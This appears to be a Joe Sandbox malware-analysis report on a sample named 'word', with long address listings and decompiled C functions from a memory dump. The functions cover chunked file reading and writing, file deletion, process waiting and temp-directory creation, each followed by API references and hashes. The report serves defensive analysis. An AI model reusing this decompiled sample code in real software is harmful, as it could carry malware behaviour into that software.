0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x0040744d
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00403479 Relevance: 4.6, APIs: 3, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403479(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t31 = 0x4000;
					_t11 =  *0x420ef8 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x4144db
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0);
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

0x00403489
0x0040349c
0x004034a1
0x004035d1
0x004035d3
0x00000000
0x004035d9
0x004034ad
0x004034c0
0x004034c6
0x004034cc
0x004034d7
0x004034dc
0x004034e1
0x004034e9
0x004034eb
0x004034eb
0x004034f4
0x004034fb
0x00000000
0x00000000
0x00403501
0x00403507
0x0040350d
0x00000000
0x00403513
0x00403519
0x00403539
0x0040353e
0x00403543
0x00403549
0x0040354f
0x00403559
0x00403560
0x00000000
0x00000000
0x00403562
0x00403568
0x0040356a
0x0040358d
0x00403593
0x00000000
0x00000000
0x00403595
0x00403597
0x00000000
0x00000000
0x00403599
0x00403599
0x004035ac
0x00000000
0x00000000
0x004035bb
0x00000000
0x004035bb
0x00403574
0x0040357b
0x004035c8
0x004035ce
0x004035ce
0x00000000
0x004035ce
0x0040357d
0x00403583
0x00403589
0x00000000
0x00000000
0x00000000
0x004035cc
0x004035cc
0x00000000
0x004035cc
0x00000000

APIs

GetTickCount.KERNEL32(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 0040348D

Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
SetFilePointer.KERNEL32(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D2C Relevance: 4.5, APIs: 3, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406133(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}

0x00405d2d
0x00405d38
0x00405d3d
0x00405d6d
0x00000000
0x00405d6d
0x00405d44
0x00405d45
0x00405d4f
0x00405d47
0x00405d47
0x00405d47
0x00405d57
0x00405d63
0x00405d67
0x00405d67
0x00000000
0x00405d59
0x00000000
0x00405d5b

APIs

Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C

RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00406AE0 Relevance: 4.5, APIs: 3, Instructions: 27
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406AE0(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A71(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}

0x00406af1
0x00406b08
0x00406afc
0x00406b06
0x00406b06
0x00406b13
0x00406b1f

APIs

WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B13

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: ObjectSingleWait$CodeExitProcess
String ID:
API String ID: 2567322000-0
Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94

Uniqueness

Uniqueness Score: -1.00%

Function 00403371 Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x00403375
0x0040337e
0x00403387
0x0040338b
0x00403396
0x00403396
0x0040339e
0x004033a5
0x004033b7
0x004033be
0x00403463
0x00403463
0x00000000
0x004033c4
0x004033c7
0x004033d3
0x004033d7
0x00403471
0x00403471
0x004033dd
0x004033e0
0x0040343f
0x00403445
0x00403447
0x00403447
0x00403459
0x00403461
0x00403468
0x0040346b
0x00000000
0x00000000
0x00000000
0x00000000
0x004033e2
0x004033e5
0x00000000
0x004033eb
0x004033f0
0x004033f7
0x004033fa
0x004033fc
0x004033fc
0x00403409
0x0040340c
0x00403413
0x00000000
0x00000000
0x0040341c
0x00403423
0x0040343b
0x00403465
0x00403465
0x00403425
0x00403425
0x00403428
0x0040342b
0x00403431
0x00403437
0x00000000
0x00403439
0x00000000
0x00403439
0x00403437
0x00000000
0x00403423
0x00000000
0x004033f0
0x004033e5
0x004033e0
0x004033d7
0x004033be
0x00403473
0x00403476

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(0x436000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405FE2: CharNextW.USER32(?), ref: 00405FF0
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC

SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
